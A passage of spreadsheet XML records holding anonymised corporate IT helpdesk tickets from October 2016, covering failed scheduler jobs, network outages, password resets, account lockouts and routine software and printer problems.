    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job hr_payroll_na_u1 failed in job_scheduler at: 10/16/2016 23:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="è½¬å‘: recall plant_247-101516-02  ref 6500073942"/>
    <s v="_x000a__x000a_received from: wktesmbp.lorjymef@gmail.com_x000a__x000a_dear team,_x000a_we got a stock recall notice from plant_247 plant,mm#2982278*200pcs need to be returned to plant_101. we just created sto#5019340040 for this request but only 80pc dn generated. pls. help to run out dn for the rest 120pc materials,thx!_x000a__x000a_b.rgds_x000a_judthtihty.zhuyhts_x000a_company hardpoint apac-wgq dc_x000a__x000a_"/>
    <s v="wktesmbp lorjymef"/>
    <x v="17"/>
  </r>
  <r>
    <s v="job Job_3050 failed in job_scheduler at: 10/16/2016 22:18:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3050 failed in job_scheduler at: 10/16/2016 22:18:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="ned on to vpn, but can not access hana or erp."/>
    <s v="name:pfzxecbo ptygkvzl_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:pfzxecbo.ptygkvzl@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:signed on to vpn, but can not access hana or erp."/>
    <s v="pfzxecbo ptygkvzl"/>
    <x v="2"/>
  </r>
  <r>
    <s v="outlook not launching."/>
    <s v="outlook not launching._x000a_-contact : _x000a_-connected to the user system using teamviewer_x000a_-user confirmed he does not use ms crm._x000a_-tried to repair the ms office._x000a_-restarted the pc._x000a_-tried to reconfigure the outlook. taking some time._x000a_-outlook ver - 2016_x000a_-user mentioned that he will call us back tomorrow with the ticket nunber_x000a_-please help the user._x000a_"/>
    <s v="dslamtcb ezbmonjr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp been locked, please help to un-lock, and tell me the new password."/>
    <s v="please help to unlock erp, and tell me the new password"/>
    <s v="cjdkhuxz bwmldgor"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_2114 failed in job_scheduler at: 10/16/2016 17:31:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2114 failed in job_scheduler at: 10/16/2016 17:31:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="bobj"/>
    <s v="_x000d__x000a__x000d__x000a_received from: vxzahrlc.frtkpehy@gmail.com_x000d__x000a__x000d__x000a_it,_x000d__x000a_please image below. i have been trying to get into bobj all day and this is all that shows up._x000d__x000a__x000d__x000a_[cid:image001.jpg@01d227c5.8a6dadd0]_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="vxzahrlc frtkpehy"/>
    <x v="20"/>
  </r>
  <r>
    <s v="account unlock"/>
    <s v="ic_x000a_ welcome, our next available agent will be with you shortly..._x000a_ interaction alerting agent._x000a_ website visitor has joined the conversation_x000a_jqxtbspr mpfdivlh_x000a_ hello rakthyesh_x000a_rakthyesh _x000a_ hi davidthd_x000a_ "/>
    <s v="jqxtbspr mpfdivlh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need to change password and sync new password on all accounts"/>
    <s v="need to change password and sync new password on all accounts"/>
    <s v="vyluaepi dtwfaejr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to sign in to skype"/>
    <s v="unable to sign in to skype"/>
    <s v="vyluaepi dtwfaejr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset for ess user nothrdaj12"/>
    <s v="password reset for ess user nothrdaj12"/>
    <s v="kihwsrdu ucnjwtxo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="circuit outage:company-na-usa-usa-plant-bld1-qa-carb-2960-01-access-sw01 switch is down since 7:14 am et on 10/16."/>
    <s v="circuit outage:company-na -usa-usa-plant-bld1-qa-carb-2960-01-access-sw01 switch is down since 7:14 am et on 10/16."/>
    <s v="bozdftwx smylqejw"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_3343 failed in job_scheduler at: 10/16/2016 04:55:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3343 failed in job_scheduler at: 10/16/2016 04:55:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="application &quot;plm conversion server&quot; on node &quot;HostName_521&quot; is in a warning state in monitoring_tool"/>
    <s v="warning:  alwaysupservice.exe process count "/>
    <s v="jloygrwh acvztedi"/>
    <x v="13"/>
  </r>
  <r>
    <s v="job Job_1140 failed in job_scheduler at: 10/16/2016 02:30:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1140 failed in job_scheduler at: 10/16/2016 02:30:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="job Job_3343 failed in job_scheduler at: 10/16/2016 01:01:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3343 failed in job_scheduler at: 10/16/2016 01:01:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job pp_EU_tool_netch_ap1 failed in job_scheduler at: 10/16/2016 00:31:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job pp_EU_tool_netch_ap1 failed in job_scheduler at: 10/16/2016 00:31:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job mm_zscr0099_wkly_rollfgyuej1 failed in job_scheduler at: 10/16/2016 00:20:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job mm_zscr0099_wkly_rollfgyuej1 failed in job_scheduler at: 10/16/2016 00:20:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_480 failed in job_scheduler at: 10/16/2016 00:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_480 failed in job_scheduler at: 10/16/2016 00:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job snp_heu_6_regen failed in job_scheduler at: 10/16/2016 00:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job snp_heu_6_regen failed in job_scheduler at: 10/16/2016 00:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_1653 failed in job_scheduler at: 10/16/2016 00:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1653 failed in job_scheduler at: 10/16/2016 00:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job snp_heu_5_regen failed in job_scheduler at: 10/16/2016 00:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job snp_heu_5_regen failed in job_scheduler at: 10/16/2016 00:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job pp_EU_tool_netch_ap2 failed in job_scheduler at: 10/15/2016 23:49:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job pp_EU_tool_netch_ap2 failed in job_scheduler at: 10/15/2016 23:49:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_3050 failed in job_scheduler at: 10/15/2016 23:38:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3050 failed in job_scheduler at: 10/15/2016 23:38:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_3050 failed in job_scheduler at: 10/15/2016 23:37:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3050 failed in job_scheduler at: 10/15/2016 23:37:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="circuit outage:india :company-ap-ind-carrier-891-dmvpn-rtr02 is down since 10.15 pm et on 10/15. primary circuit is up."/>
    <s v="what type of outage:  _____network     xcircuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    __no_______     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ___10.15 pm et on 10/15___________________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? ____no___    (yes/no/na)     company power  _________     provider power __________x000d__x000a_                _x000d__x000a_4.  scheduled maintenance ( network) ? no___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x v="7"/>
  </r>
  <r>
    <s v="planned power outage :matlxjgi elrndiuy - (company) hard down since 10:03 pm on 10/15 et"/>
    <s v="what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    _____yes____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _______10:03 pm on 10/15 et_______________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? ____na___    (yes/no/na)     company power  _________     provider power __________x000d__x000a_                _x000d__x000a_4.  scheduled maintenance ( network) ? ____na___    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000d__x000a__x000d__x000a_5. does site have a backup circuit ?  __yes____    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   _____no___     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   ______na_____   (yes/no/na) _x000d__x000a__x000d__x000a_9. equipment reset ?    ______na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yes____     (yes/no/na)    cert started  ?________    (yes/no/na) _x000d__x000a__x000d__x000a_13.  additional diagnostics"/>
    <s v="jloygrwh acvztedi"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_737 failed in job_scheduler at: 10/15/2016 21:11:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a_backup statistics:_x000d__x000a_          _x000d__x000a_  session queuing time (hours)         0.00        _x000d__x000a_  -------------------------------------------      _x000d__x000a_  completed disk agents ........         32          _x000d__x000a_  failed disk agents ...........          0          _x000d__x000a_  aborted disk agents ..........          0          _x000d__x000a_  -------------------------------------------      _x000d__x000a_  disk agents total  ...........         32          _x000d__x000a_  ===========================================      _x000d__x000a_  completed media agents .......          1          _x000d__x000a_  failed media agents ..........          1          _x000d__x000a_  aborted media agents .........          0          _x000d__x000a_  -------------------------------------------      _x000d__x000a_  media agents total  ..........          2          _x000d__x000a_  ===========================================      _x000d__x000a_  mbytes total .................  277264 mb        _x000d__x000a_  used media total .............          1          _x000d__x000a_  disk agent errors total ......          0    _x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_job Job_737 failed in job_scheduler at: 10/15/2016 21:11:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="sound not working , suspecting email threat"/>
    <s v="from: thaybd mhasttdd _x000a_sent: saturday, october 15, 2016 10:52 pm_x000a_to: nwfodmhc exurcwkm_x000a_cc: rohthsit mhdyhtya_x000a_subject: fw: inquiry - purchase order_x000a__x000a_hi,_x000a__x000a_kindly check for below mail, is hope it may be junk mail. i never meet any person as name shows of sender. i have tried opening attachment but unable to do that._x000a_forwarding this mail for seeking it help to check whether its only junk mail or attachment opeyctrhbkm plvnuxmry cause issues ( like virus or our company database theft through link)_x000a__x000a_please check and confirm._x000a__x000a_best "/>
    <s v="esaqztby mhnbqiyc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="inquiry on erp SID_34 maintenance  "/>
    <s v="inquiry on erp SID_34 maintenance  "/>
    <s v="rzckwufx vgysnlab"/>
    <x v="0"/>
  </r>
  <r>
    <s v="apac, company: multiple switches went down at 07:36 pm et on 10/15. "/>
    <s v="company-ap-chn-apac-company-fpsf-2960s-access-sw01_x000d__x000a_company-ap-chn-apac-company-pmw-2960s-access-sw01_x000d__x000a_company-ap-chn-apac-company-psf-2960s-access-sw01"/>
    <s v="mnlazfsr mtqrkhnx"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job bcv117_SID_37 failed in job_scheduler at: 10/15/2016 18:03:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bcv117_SID_37 failed in job_scheduler at: 10/15/2016 18:03:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="1"/>
  </r>
  <r>
    <s v="job SID_38hoti failed in job_scheduler at: 10/15/2016 17:27:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_38hoti failed in job_scheduler at: 10/15/2016 17:27:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job SID_55hoti failed in job_scheduler at: 10/15/2016 17:25:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_55hoti failed in job_scheduler at: 10/15/2016 17:25:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_563 failed in job_scheduler at: 10/15/2016 15:12:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_563 failed in job_scheduler at: 10/15/2016 15:12:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_480 failed in job_scheduler at: 10/15/2016 13:18:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_480 failed in job_scheduler at: 10/15/2016 13:18:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="11"/>
  </r>
  <r>
    <s v="job bwhrattr failed in job_scheduler at: 10/15/2016 08:45:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bwhrattr failed in job_scheduler at: 10/15/2016 08:45:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="job Job_1320 failed in job_scheduler at: 10/15/2016 08:31:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1320 failed in job_scheduler at: 10/15/2016 08:31:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="pc an r241 in halle c nÃ¤he bÃ¼ro nesner fÃ¤hrt nicht hoch"/>
    <s v="einlasten bei it-germany, da hierfÃ¼r bereits ein ersatz-pc verbaut ist und ein neuer bestellt wurde."/>
    <s v="dtrvxiuq bwuqdtfo"/>
    <x v="32"/>
  </r>
  <r>
    <s v=" laptop model latitude 7350 speakers are not working"/>
    <s v="name:ilypdtno mkdfetuq_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:ilypdtno.mkdfetuq@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:my laptop model latitude 7350 speakers are not working"/>
    <s v="ilypdtno mkdfetuq"/>
    <x v="18"/>
  </r>
  <r>
    <s v="jobs are getting fail due to dbif_rsql_sql_error issue"/>
    <s v="jobs are getting fail due to dbif_rsql_sql_error issue"/>
    <s v="xagyhbio jvrdnpkh"/>
    <x v="1"/>
  </r>
  <r>
    <s v="network outage: vogelfontein, south africa ,sa network is down since 2:28am et on 10/15/16"/>
    <s v="what type of outage:  ___x__network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ________2:28am et on 10/15/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no_____     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   _____na______   (yes/no/na) _x000d__x000a__x000d__x000a_9. equipment reset ?    _____na______    (yes/no/na) _x000d__x000a__x000d__x000a_10. verified site working on backup circuit ?  ___no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job bwsdslspln failed in job_scheduler at: 10/15/2016 02:27:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bwsdslspln failed in job_scheduler at: 10/15/2016 02:27:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="job Job_1338 failed in job_scheduler at: 10/15/2016 02:06:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1338 failed in job_scheduler at: 10/15/2016 02:06:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="job Job_1373 failed in job_scheduler at: 10/15/2016 02:03:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1373 failed in job_scheduler at: 10/15/2016 02:03:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="job Job_1382 failed in job_scheduler at: 10/15/2016 01:39:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1382 failed in job_scheduler at: 10/15/2016 01:39:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v=" server lnbdm839 (active directory) located in   philadelphâ€‹ia is down since 1:14am et on 10/15/16"/>
    <s v=" server lnbdm839 (active directory) located in   philadelphâ€‹ia is down since 1:14am et on 10/15/16"/>
    <s v="dkmcfreg anwmfvlg"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job bk_hana_SID_62_erp_dly_dp failed in job_scheduler at: 10/15/2016 01:32:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bk_hana_SID_62_erp_dly_dp failed in job_scheduler at: 10/15/2016 01:32:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="erp SID_34 account locked"/>
    <s v="erp SID_34 account locked"/>
    <s v="iczltbdf cmvjhyxl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="m drive access request"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ajlbguzn.fxrwivyg@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_please provide access m:\pu5&lt;file:///\\HostName_95\departments\pu5&gt; press tool folder for following computers._x000d__x000a_awywx217842_x000d__x000a_awyl8911908_x000d__x000a__x000d__x000a_with best "/>
    <s v="ajlbguzn fxrwivyg"/>
    <x v="11"/>
  </r>
  <r>
    <s v="job SID_56filesys failed in job_scheduler at: 10/15/2016 00:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_56filesys failed in job_scheduler at: 10/15/2016 00:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_1653 failed in job_scheduler at: 10/15/2016 00:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1653 failed in job_scheduler at: 10/15/2016 00:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="pass word reset "/>
    <s v="_x000a__x000a_received from: ujzhflpn.oibnxrvq@gmail.com_x000a__x000a_hi_x000a__x000a_               please reset the pass word as &quot;daypay3&quot; for below user id_x000a_user id â€“ purartnpn12_x000a__x000a__x000a_best "/>
    <s v="ujzhflpn oibnxrvq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="network outage: engineering_toolkuznetsk warehouse - (company) network is down since 9:47pm et on 10/14/16"/>
    <s v="what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ___no______     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ________9:47pm et on 10/14/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_____     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   _____na_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job SID_56filesys failed in job_scheduler at: 10/14/2016 22:25:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_56filesys failed in job_scheduler at: 10/14/2016 22:25:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="vogelfontein, south africa , sa:company-eu-zaf-vogelfontein-2960-access-sw08.company.com is down since 8:04 pm et on 10/14."/>
    <s v="vogelfontein, south africa , sa:company-eu-zaf-vogelfontein-2960-access-sw08.company.com is down since 8:04 pm et on 10/14._x000d__x000a_interface down - on   gigabitethernet1/0/49 Â· uplink to company-eu-zaf-vogelfontein-2960-access-sw08 - on   company-eu-zaf-vogelfontein-2960-core-sw01.company.com "/>
    <s v="oldrctiu bxurpsyi"/>
    <x v="7"/>
  </r>
  <r>
    <s v="password reset request"/>
    <s v="password reset request"/>
    <s v="svnptdwu zopxaqib"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to sync mails or calendars on mobile device"/>
    <s v="unable to sync mails or calendars on mobile device"/>
    <s v="jyzkbgpm vxmjcbdw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on inplant_869636"/>
    <s v="ticket update on inplant_869636"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect to network printer"/>
    <s v="unable to connect to network printer_x000d__x000a__x000d__x000a_ticket update on inplant_869629"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_562 failed in job_scheduler at: 10/14/2016 17:51:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_562 failed in job_scheduler at: 10/14/2016 17:51:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="password not update "/>
    <s v="_x000d__x000a__x000d__x000a_received from: cuzhydjl.fugwxdqh@gmail.com_x000d__x000a__x000d__x000a_hello team good afternoon._x000d__x000a__x000d__x000a_my name is cuzhydjl fugwxdqh, mexico queretaro._x000d__x000a__x000d__x000a_unfortunate my password was expired but i forgot update it, now i cannot enter  at the company systems (distributor_tool, crm,)_x000d__x000a__x000d__x000a_today i tried to change the password but the web site don't give me access, please can you said me what i should do about this?_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="cuzhydjl fugwxdqh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="network printer not working"/>
    <s v="_x000d__x000a__x000d__x000a_received from: umzcxfah.aoshpjiu@gmail.com_x000d__x000a__x000d__x000a_please check to see if printer rr14 on lrrsm007 is connected to the network.  i have sent several documents but they are all sitting in queue.  the printer is turned on and says it is ready but nothing happens._x000d__x000a_"/>
    <s v="umzcxfah aoshpjiu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on inplant_869625"/>
    <s v="ticket update on inplant_869625"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="folder deleted in HostName_768"/>
    <s v="folder deleted in HostName_768_x000a__x000a_folder needs to be restored_x000a__x000a_t:\globaleng\beyond machining\gtc\_x000a__x000a_"/>
    <s v="pyrtfdxu nxfkqmoy"/>
    <x v="4"/>
  </r>
  <r>
    <s v="unable to log in to erp netweaver "/>
    <s v="unable to log in to erp netweaver "/>
    <s v="lzqbyner jyncfahz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows password reset"/>
    <s v="windows password reset"/>
    <s v="mxifcasu cxsembup"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ess password reset"/>
    <s v="ess password reset"/>
    <s v="qdezvfts raikxeon"/>
    <x v="0"/>
  </r>
  <r>
    <s v="request: unlock user account  (sekarf4ts)"/>
    <s v="_x000a__x000a_received from: sthyuraj.sektyhar@company.com_x000a__x000a_hello,_x000a__x000a_please unlock my user account_x000a__x000a_user name: sekarf4ts_x000a__x000a__x000a__x000a_"/>
    <s v="sxhqfaoe evobwgiy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows account lockout"/>
    <s v="windows account lockout"/>
    <s v="dmtcvxow xkjriven"/>
    <x v="0"/>
  </r>
  <r>
    <s v="company center accounts added- help with a deleted item"/>
    <s v="please add to my company center accounts 81543268,70453441,81819969,70776642,81887755,70823214 and 81936238.  on account 81945823 i accidently deleted the orders section please restore"/>
    <s v="dypabsjm nuzvhjik"/>
    <x v="21"/>
  </r>
  <r>
    <s v="job snp_heu_6_regen failed in job_scheduler at: 10/14/2016 14:55:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job snp_heu_6_regen failed in job_scheduler at: 10/14/2016 14:55:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="cannot create a delivery. please fix this in apo"/>
    <s v="_x000a__x000a_received from: hybiaxlk.lawptzir@gmail.com_x000a__x000a_[cid:image001.jpg@01d22610.66263d40]_x000a__x000a_kryuisti turleythy_x000a_usa site business manager_x000a_hybiaxlk.lawptzir@gmail.com&lt;mailto:hybiaxlk.lawptzir@gmail.com&gt;_x000a__x000a__x000a__x000a_"/>
    <s v="hybiaxlk lawptzir"/>
    <x v="5"/>
  </r>
  <r>
    <s v="job snp_heu_5_regen failed in job_scheduler at: 10/14/2016 14:25:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job snp_heu_5_regen failed in job_scheduler at: 10/14/2016 14:25:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="create telephony_software id for the gso new hire sewilrxm cbikymvf "/>
    <s v="create telephony_software id for the gso new hire sewilrxm cbikymvf "/>
    <s v="sewilrxm cbikymvf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to save exe file"/>
    <s v="_x000d__x000a__x000d__x000a_received from: rlphwiqn.zagvbkro@gmail.com_x000d__x000a__x000d__x000a_hello_x000d__x000a_i need help saving an .exe file. i had an analyst attempting to help today and he asked me to put in a help desk ticket as there is a problem with my pc. the file he is attempting to save is attached._x000d__x000a__x000d__x000a_"/>
    <s v="edqylkio ykomciav"/>
    <x v="2"/>
  </r>
  <r>
    <s v="vip 2: user unable to join skype meeting from external vendor"/>
    <s v="vip 2: user unable to join skype meeting from external vendor"/>
    <s v="mfdaluin gxtkyzeb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="analysis for office (aao) tool  "/>
    <s v="install the analysis for office (aao) tool   on the laptop."/>
    <s v="hkfipags sdilxrfk"/>
    <x v="18"/>
  </r>
  <r>
    <s v="error: no sto possible with these combinations"/>
    <s v="error: no sto possible with these combinations_x000d__x000a__x000d__x000a_error when entering a stock transfer for material # 2122807 from plant_93 to plant_333._x000d__x000a__x000d__x000a_"/>
    <s v="koqntham sqiuctfl"/>
    <x v="29"/>
  </r>
  <r>
    <s v="system hangs and slow"/>
    <s v="help to format and reinstall the os on the laptop . system is getting hang suddenly and slow running."/>
    <s v="aqourvgz mkehgcdu"/>
    <x v="18"/>
  </r>
  <r>
    <s v="java error"/>
    <s v="help to update the java ver.on the internet explore"/>
    <s v="ejmdqfbl xuqkwdfa"/>
    <x v="18"/>
  </r>
  <r>
    <s v="access issue"/>
    <s v="unable to install the software asking for administrator access"/>
    <s v="ydgasebx ceuyrjhs"/>
    <x v="18"/>
  </r>
  <r>
    <s v="access denied on the collaboration_platform finance link"/>
    <s v="link where user needs access _x000d__x000a__x000d__x000a_"/>
    <s v="wqxzleky uwjchqor"/>
    <x v="15"/>
  </r>
  <r>
    <s v="melisdfysa is not receiving emails from  k-rgrtrs"/>
    <s v="melisdfysa is not included on the k-rgrtrs email list.  she is not receiving emails coming from this address._x000a__x000a_"/>
    <s v="owfecbnx gfloariu"/>
    <x v="19"/>
  </r>
  <r>
    <s v="phone issue"/>
    <s v="phone issue"/>
    <s v="gzjtweph mnslwfqv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="generirtc information"/>
    <s v="generirtc information"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account lockout"/>
    <s v="account lockout"/>
    <s v="nrmjhuox ktuyqewp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="when i click on the download to pdf i don't get the pop-up which allows me to download to pdf (see attachment)"/>
    <s v="when i click on the download to pdf i don't get the pop-up which allows me to download to pdf (see attachment)_x000d__x000a_hi this is bthrob ducyua,_x000d__x000a_i had don put *.crm.dynamics.com in his popup blocker and it worked, i don't know if that's the only thing he needs in the pop-up blocker i also had him put company.collaboration_platform.com in his pop-up blocker because that's what i had in mine.  please close this ticket if this is all that needs to be done."/>
    <s v="ijplstng juybetlo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="blank call"/>
    <s v="blank call"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect to vpn"/>
    <s v="unable to connect to vpn"/>
    <s v="ijplstng juybetlo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook issue"/>
    <s v="outlook issue // unable to open new email and is going to not responding."/>
    <s v="vfsjoquc razepdqb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="inc1559041 - ticket update"/>
    <s v="inc1559041 - ticket update"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="lost connection to \\hqn029 which is a personal drive shared between my desktop and laptop. "/>
    <s v="i lost connection to \\hqn029 which is a personal drive shared between my desktop and laptop. i am able to access it on my desktop but no longer on my laptop. i tried to map to the location again, but was unsuccessful. "/>
    <s v="zhwktnia dfhormwk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i cant see my archived emails in outlook.  i am leaving today, and natytse sylyhtsvesuyter will need to see those archived emails"/>
    <s v="outlook"/>
    <s v="koiapqbg teyldpkw"/>
    <x v="0"/>
